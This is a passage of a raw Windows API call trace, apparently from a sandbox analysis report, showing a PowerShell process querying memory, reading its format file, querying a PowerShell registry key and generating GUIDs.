GetLastError () returned 0x0 [0152.264] VirtualQuery (in: lpAddress=0x12cfc4, lpBuffer=0x12dfc4, dwLength=0x1c | out: lpBuffer=0x12dfc4*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.264] VirtualQuery (in: lpAddress=0x12d000, lpBuffer=0x12e000, dwLength=0x1c | out: lpBuffer=0x12e000*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d9b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.264] GetLastError () returned 0x0 [0152.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d968, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.264] GetLastError () returned 0x0 [0152.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d968, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.264] GetLastError () returned 0x0 [0152.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12db50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.264] GetLastError () returned 0x0 [0152.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.264] GetLastError () returned 0x0 [0152.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.264] GetLastError () returned 0x0 [0152.265] VirtualQuery (in: lpAddress=0x12cfc4, lpBuffer=0x12dfc4, dwLength=0x1c | out: lpBuffer=0x12dfc4*(BaseAddress=0x12c000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.265] VirtualQuery (in: lpAddress=0x12d000, lpBuffer=0x12e000, dwLength=0x1c | out: lpBuffer=0x12e000*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.267] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x8222ec3e, Data2=0xd6d7, Data3=0x473f, Data4=([0]=0xba, [1]=0xd4, [2]=0x7a, [3]=0x57, [4]=0x35, [5]=0x65, [6]=0xc4, [7]=0x20))) returned 0x0 [0152.267] VirtualQuery (in: lpAddress=0x12d394, lpBuffer=0x12e394, dwLength=0x1c | out: lpBuffer=0x12e394*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.269] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xdd9eebbd, Data2=0xe0f5, Data3=0x4f1f, Data4=([0]=0x94, [1]=0xfd, [2]=0xb4, [3]=0xca, [4]=0xac, [5]=0xc4, [6]=0xe7, [7]=0x38))) returned 0x0 [0152.271] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xa23b156f, Data2=0x3774, Data3=0x4118, Data4=([0]=0xb2, [1]=0xad, [2]=0x74, [3]=0x37, [4]=0xae, [5]=0xa7, [6]=0x9a, [7]=0xff))) returned 0x0 [0152.271] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xc1a3d521, Data2=0xf88f, Data3=0x4cd9, Data4=([0]=0xa7, [1]=0xec, [2]=0x35, [3]=0x60, [4]=0x2c, [5]=0x15, [6]=0xc9, [7]=0xc5))) returned 0x0 [0152.271] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x88b9c76a, Data2=0x58a8, Data3=0x48a4, Data4=([0]=0xa5, [1]=0x77, [2]=0x30, [3]=0xb2, [4]=0x8, [5]=0x64, [6]=0xa, [7]=0xb7))) returned 0x0 [0152.272] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x1456deb9, Data2=0x9242, Data3=0x4c51, Data4=([0]=0x92, [1]=0x5f, [2]=0x1e, [3]=0xe0, [4]=0x28, [5]=0x91, [6]=0xa9, [7]=0xa9))) returned 0x0 [0152.272] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x12144550, Data2=0x16d7, Data3=0x4c84, Data4=([0]=0x9f, [1]=0x7, [2]=0xbb, [3]=0x80, [4]=0xaf, [5]=0x1a, [6]=0x91, [7]=0x35))) returned 0x0 [0152.273] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x93ffeae3, Data2=0xad65, Data3=0x4c3c, Data4=([0]=0xa5, [1]=0x8b, [2]=0x7, [3]=0xde, [4]=0x3a, [5]=0x67, [6]=0xf5, [7]=0xe9))) returned 0x0 [0152.273] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xeaad7b67, Data2=0x1d7b, Data3=0x4574, Data4=([0]=0xa1, [1]=0x7b, [2]=0x36, [3]=0x96, [4]=0xc2, [5]=0x46, [6]=0x3, [7]=0x6b))) returned 0x0 [0152.273] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xd42ac154, Data2=0x50bb, Data3=0x45a2, Data4=([0]=0x91, [1]=0x5, [2]=0x3, [3]=0xdb, [4]=0xd9, [5]=0xf9, [6]=0xbb, [7]=0x6e))) returned 0x0 [0152.273] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x350 [0152.273] GetLastError () returned 0x0 [0152.273] GetFileType (hFile=0x350) returned 0x1 [0152.273] SetErrorMode (uMode=0x1) returned 0x1 [0152.273] GetFileType (hFile=0x350) returned 0x1 [0152.274] ReadFile (in: hFile=0x350, lpBuffer=0x326e468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x326e468*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.275] GetLastError () returned 0x0 [0152.276] ReadFile (in: hFile=0x350, lpBuffer=0x326e468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x326e468*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.276] GetLastError () returned 0x0 [0152.276] ReadFile (in: hFile=0x350, lpBuffer=0x326e468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x326e468*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.276] GetLastError () returned 0x0 [0152.276] ReadFile (in: hFile=0x350, lpBuffer=0x326e468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x326e468*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.276] GetLastError () returned 0x0 [0152.276] ReadFile (in: hFile=0x350, lpBuffer=0x326e468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x326e468*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.276] GetLastError () returned 0x0 [0152.277] ReadFile (in: hFile=0x350, lpBuffer=0x326e468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x326e468*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.277] GetLastError () returned 0x0 [0152.277] ReadFile (in: hFile=0x350, lpBuffer=0x326e468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x326e468*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.277] GetLastError () returned 0x0 [0152.277] ReadFile (in: hFile=0x350, lpBuffer=0x326e468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x326e468*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.277] GetLastError () returned 0x0 [0152.277] ReadFile (in: hFile=0x350, lpBuffer=0x326e468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x326e468*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.277] GetLastError () returned 0x0 [0152.278] ReadFile (in: hFile=0x350, lpBuffer=0x326e468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x326e468*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.278] GetLastError () returned 0x0 [0152.278] ReadFile (in: hFile=0x350, lpBuffer=0x326e468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x326e468*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.278] GetLastError () returned 0x0 [0152.278] ReadFile (in: hFile=0x350, lpBuffer=0x326e468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x326e468*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.279] GetLastError () returned 0x0 [0152.279] ReadFile (in: hFile=0x350, lpBuffer=0x326e468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x326e468*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.279] GetLastError () returned 0x0 [0152.279] ReadFile (in: hFile=0x350, lpBuffer=0x326e468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x326e468*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.279] GetLastError () returned 0x0 [0152.279] ReadFile (in: hFile=0x350, lpBuffer=0x326e468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x326e468*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.279] GetLastError () returned 0x0 [0152.279] ReadFile (in: hFile=0x350, lpBuffer=0x326e468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x326e468*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.279] GetLastError () returned 0x0 [0152.279] ReadFile (in: hFile=0x350, lpBuffer=0x326e468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x326e468*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.279] GetLastError () returned 0x0 [0152.281] ReadFile (in: hFile=0x350, lpBuffer=0x326e468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x326e468*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.281] GetLastError () returned 0x0 [0152.281] ReadFile (in: hFile=0x350, lpBuffer=0x326e468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x326e468*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.281] GetLastError () returned 0x0 [0152.281] ReadFile (in: hFile=0x350, lpBuffer=0x326e468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x326e468*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.281] GetLastError () returned 0x0 [0152.281] ReadFile (in: hFile=0x350, lpBuffer=0x326e468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x326e468*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0152.281] GetLastError () returned 0x0 [0152.282] ReadFile (in: hFile=0x350, lpBuffer=0x326e468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x326e468*, lpNumberOfBytesRead=0x12e724*=0xe67, lpOverlapped=0x0) returned 1 [0152.282] GetLastError () returned 0x0 [0152.282] ReadFile (in: hFile=0x350, lpBuffer=0x326da6f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x326da6f*, lpNumberOfBytesRead=0x12e724*=0x0, lpOverlapped=0x0) returned 1 [0152.282] GetLastError () returned 0x0 [0152.282] ReadFile (in: hFile=0x350, lpBuffer=0x326e468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x326e468*, lpNumberOfBytesRead=0x12e724*=0x0, lpOverlapped=0x0) returned 1 [0152.282] GetLastError () returned 0x0 [0152.282] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e6a8 | out: phkResult=0x12e6a8*=0x350) returned 0x0 [0152.282] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12e6f0, lpData=0x0, lpcbData=0x12e6ec*=0x0 | out: lpType=0x12e6f0*=0x1, lpData=0x0, lpcbData=0x12e6ec*=0x56) returned 0x0 [0152.283] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12e6f0, lpData=0x509ca8, lpcbData=0x12e6ec*=0x56 | out: lpType=0x12e6f0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x12e6ec*=0x56) returned 0x0 [0152.283] RegCloseKey (hKey=0x350) returned 0x0 [0152.285] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xb9fc92d5, Data2=0xf737, Data3=0x4ca1, Data4=([0]=0x9a, [1]=0x7b, [2]=0x99, [3]=0x1a, [4]=0xfa, [5]=0xa1, [6]=0x2d, [7]=0xd5))) returned 0x0 [0152.285] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x5c65a45d, Data2=0x5ce8, Data3=0x4449, Data4=([0]=0xbf, [1]=0x44, [2]=0x73, [3]=0x7f, [4]=0xa3, [5]=0x4b, [6]=0xba, [7]=0xde))) returned 0x0 [0152.285] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xc4c801ee, Data2=0xd1d1, Data3=0x4f2d, Data4=([0]=0x95, [1]=0x38, [2]=0x35, [3]=0x4, [4]=0x2f, [5]=0x13, [6]=0x90, [7]=0x24))) returned 0x0 [0152.285] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x1393076, Data2=0x9260, Data3=0x48bc, Data4=([0]=0x9e, [1]=0x8d, [2]=0x6b, [3]=0x6d, [4]=0x55, [5]=0x81, [6]=0xef, [7]=0x24))) returned 0x0 [0152.285] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x4f944ccc, Data2=0x31c5, Data3=0x4eae, Data4=([0]=0xa6, [1]=0x45, [2]=0xf7, [3]=0x7f, [4]=0x70, [5]=0xed, [6]=0x78, [7]=0x82))) returned 0x0 [0152.286] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x7f21516a, Data2=0x8872, Data3=0x4a1d, Data4=([0]=0xa3, [1]=0xe7, [2]=0x3a, [3]=0xfc, [4]=0x73, [5]=0x5e, [6]=0xf7, [7]=0x2e))) returned 0x0 [0152.286] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x49906f59, Data2=0x4939, Data3=0x416b, Data4=([0]=0xa0, [1]=0x1a, [2]=0xdb, [3]=0x46, [4]=0x3a, [5]=0xa0, [6]=0x34, [7]=0x77))) returned 0x0 [0152.286] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x43aea6d4, Data2=0xb2f9, Data3=0x4ffb, Data4=([0]=0x84, [1]=0xd, [2]=0x3d, [3]=0xe8, [4]=0xc5, [5]=0x6b, [6]=0x71, [7]=0x52))) returned 0x0 [0152.286] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xb41b0fa0, Data2=0x9476, Data3=0x47e0, Data4=([0]=0x8e, [1]=0xb9, [2]=0xb6, [3]=0xf4, [4]=0xe6, [5]=0xd3, [6]=0x23, [7]=0xdc))) returned 0x0 [0152.286] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xe50b65eb, Data2=0xf32f, Data3=0x4ca6, Data4=([0]=0xb8, [1]=0xe, [2]=0x22, [3]=0xd5, [4]=0x42, [5]=0x6a, [6]=0xa0, [7]=0xbe))) returned 0x0 [0152.286] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x90c19f17, Data2=0xdf30, Data3=0x4a16, Data4=([0]=0xbf, [1]=0x3f, [2]=0x6f, [3]=0xf, [4]=0xc5, [5]=0xd8, [6]=0xef, [7]=0x19))) returned 0x0 [0152.287] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x2ac0230f, Data2=0xa7d4, Data3=0x41fe, Data4=([0]=0x9a, [1]=0xe0, [2]=0xf6, [3]=0x6d, [4]=0x29, [5]=0x54, [6]=0xb5, [7]=0xfc))) returned 0x0 [0152.287] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x72edb840, Data2=0x78f0, Data3=0x4346, Data4=([0]=0x88, [1]=0x45, [2]=0x18, [3]=0x77, [4]=0x41, [5]=0x5e, [6]=0x33, [7]=0x79))) returned 0x0 [0152.287] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x28e0f2ff, Data2=0xdbd3, Data3=0x4814, Data4=([0]=0x8f, [1]=0xc4, [2]=0xfd, [3]=0x2b, [4]=0x5d, [5]=0x18, [6]=0x26, [7]=0xc4))) returned 0x0 [0152.287] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x8f36f98b, Data2=0x73c, Data3=0x47f1, Data4=([0]=0x9d, [1]=0x19, [2]=0xb3, [3]=0x5, [4]=0x4d, [5]=0x7f, [6]=0xdf, [7]=0x3f))) returned 0x0 [0152.287] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xf3e0412, Data2=0x6210, Data3=0x42f9, Data4=([0]=0xaf, [1]=0x52, [2]=0x4, [3]=0xcf, [4]=0xb6, [5]=0x3b, [6]=0x5c, [7]=0xb8))) returned 0x0 [0152.287] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xae973ad0, Data2=0x95c, Data3=0x4636, Data4=([0]=0x84, [1]=0x3f, [2]=0x50, [3]=0x35, [4]=0x77, [5]=0xc6, [6]=0xf5, [7]=0x83))) returned 0x0 [0152.287] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x3bdf4542, Data2=0x73cc, Data3=0x4ac0, Data4=([0]=0xaa, [1]=0xe0, [2]=0x3d, [3]=0x1a, [4]=0xfc, [5]=0x56, [6]=0x87, [7]=0xec))) returned 0x0 [0152.287] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x2ba06055, Data2=0x8724, Data3=0x4d00, Data4=([0]=0xad, [1]=0x19, [2]=0x50, [3]=0xce, [4]=0x98, [5]=0x3d, [6]=0x4d, [7]=0x55))) returned 0x0 [0152.288] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x414646f8, Data2=0xd6ba, Data3=0x44a1, Data4=([0]=0x81, [1]=0x7a, [2]=0x3d, [3]=0x23, [4]=0xff, [5]=0xad, [6]=0x5, [7]=0x5))) returned 0x0 [0152.288] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x43f30fb7, Data2=0x6ccc, Data3=0x4776, Data4=([0]=0x8b, [1]=0xff, [2]=0xd6, [3]=0xc1, [4]=0xfe, [5]=0x4c, [6]=0xc7, [7]=0x19))) returned 0x0 [0152.288] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x4d43f0a6, Data2=0x457f, Data3=0x4d54, Data4=([0]=0xb0, [1]=0xb2, [2]=0x77, [3]=0xea, [4]=0xac, [5]=0xa1, [6]=0xfe, [7]=0xe1))) returned 0x0 [0152.288] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x60e72018, Data2=0x580d, Data3=0x4c37, Data4=([0]=0xa9, [1]=0x32, [2]=0xf5, [3]=0x52, [4]=0x93, [5]=0x1e, [6]=0x65, [7]=0xc6))) returned 0x0 [0152.288] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x79a1a21, Data2=0xf13, Data3=0x45a0, Data4=([0]=0xb5, [1]=0x72, [2]=0x23, [3]=0x68, [4]=0x88, [5]=0xff, [6]=0xa4, [7]=0xee))) returned 0x0 [0152.289] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x3da4c62b, Data2=0x85b6, Data3=0x4f3a, Data4=([0]=0xb5, [1]=0x10, [2]=0xdd, [3]=0x95, [4]=0x1a, [5]=0x32, [6]=0x59, [7]=0xd0))) returned 0x0 [0152.289] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x21b0db8, Data2=0x2e4, Data3=0x4e99, Data4=([0]=0x8e, [1]=0x47, [2]=0xe2, [3]=0x23, [4]=0x26, [5]=0x80, [6]=0xe2, [7]=0x9b))) returned 0x0 [0152.289] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x52ab18ff, Data2=0xe7c7, Data3=0x460c, Data4=([0]=0xb9, [1]=0xb6, [2]=0xd6, [3]=0x8d, [4]=0xfb, [5]=0x67, [6]=0x10, [7]=0xd9))) returned 0x0 [0152.289] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x3dc98836, Data2=0xb29, Data3=0x43a2, Data4=([0]=0x9c, [1]=0x20, [2]=0x94, [3]=0x2d, [4]=0xc7, [5]=0x99, [6]=0xdf, [7]=0x12))) returned 0x0 [0152.289] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xbd2f98bc, Data2=0xeeab, Data3=0x4005, Data4=([0]=0xa2, [1]=0xaa, [2]=0x5d, [3]=0x1, [4]=0x60, [5]=0x24, [6]=0x66, [7]=0xaa))) returned 0x0 [0152.289] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x77b56f4d, Data2=0xec85, Data3=0x453b, Data4=([0]=0xb1, [1]=0x51, [2]=0x4d, [3]=0xe3, [4]=0xb2, [5]=0xd9, [6]=0x7f, [7]=0x5d))) returned 0x0 [0152.290] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x1f551166, Data2=0xbf29, Data3=0x4d05, Data4=([0]=0x98, [1]=0x77, [2]=0x9f, [3]=0xd0, [4]=0xdf, [5]=0xcc, [6]=0x67, [7]=0x1))) returned 0x0 [0152.290] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x773619dc, Data2=0x5ff0, Data3=0x4c6e, Data4=([0]=0x84, [1]=0x7d, [2]=0xed, [3]=0x52, [4]=0x78, [5]=0x95, [6]=0xc6, [7]=0x4f))) returned 0x0 [0152.290] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x6c5ca008, Data2=0x86d9, Data3=0x4b9d, Data4=([0]=0x9c, [1]=0x8e, [2]=0x99, [3]=0x92, [4]=0x42, [5]=0xc3, [6]=0x5a, [7]=0xbb))) returned 0x0 [0152.291] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x285254f4, Data2=0xf298, Data3=0x42be, Data4=([0]=0x99, [1]=0x80, [2]=0xc9, [3]=0x23, [4]=0x52, [5]=0xef, [6]=0x4e, [7]=0xc6))) returned 0x0 [0152.291] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x75427373, Data2=0x2036, Data3=0x43d7, Data4=([0]=0x96, [1]=0x94, [2]=0xd1, [3]=0x9, [4]=0xe0, [5]=0x5d, [6]=0xb7, [7]=0x50))) returned 0x0 [0152.292] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x6257c83c, Data2=0x3aab, Data3=0x4da3, Data4=([0]=0x8e, [1]=0xd6, [2]=0x87, [3]=0xa9, [4]=0xd2, [5]=0x7e, [6]=0xe8, [7]=0xf3))) returned 0x0 [0152.292] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xa204bb06, Data2=0x6e45, Data3=0x4d97, Data4=([0]=0x84, [1]=0x88, [2]=0xe4, [3]=0xe1, [4]=0xd0, [5]=0xbb, [6]=0xd4, [7]=0x42))) returned 0x0 [0152.292] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x63cc2f43, Data2=0x7b66, Data3=0x4d23, Data4=([0]=0xa4, [1]=0x73, [2]=0xcf, [3]=0xab, [4]=0xe4, [5]=0x53, [6]=0xe1, [7]=0x1e))) returned 0x0 [0152.292] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x88844fb, Data2=0x2522, Data3=0x465e, Data4=([0]=0xb1, [1]=0x3b, [2]=0x7c, [3]=0xfd, [4]=0x46, [5]=0x4c, [6]=0x5c, [7]=0xca))) returned 0x0 [0152.292] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xd8f9ae22, Data2=0xd341, Data3=0x44d3, Data4=([0]=0x8b, [1]=0x98, [2]=0xdd, [3]=0x76, [4]=0xa3, [5]=0x9c, [6]=0xaf, [7]=0x1c))) returned 0x0 [0152.292] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xa94d2b21, Data2=0x3728, Data3=0x4a90, Data4=([0]=0x93, [1]=0xa7, [2]=0xaa, [3]=0xbd, [4]=0xc9, [5]=0x65, [6]=0x9, [7]=0x4e))) returned 0x0 [0152.293] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x4bb170b6, Data2=0x3e90, Data3=0x4871, Data4=([0]=0xb4, [1]=0x3b, [2]=0x5, [3]=0xd6, [4]=0x58, [5]=0x9a, [6]=0xa6, [7]=0x0))) returned 0x0 [0152.293] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xa29efcce, Data2=0x4dfd, Data3=0x42bc, Data4=([0]=0x8e, [1]=0x35, [2]=0x56, [3]=0xe4, [4]=0x2a, [5]=0x82, [6]=0xd3, 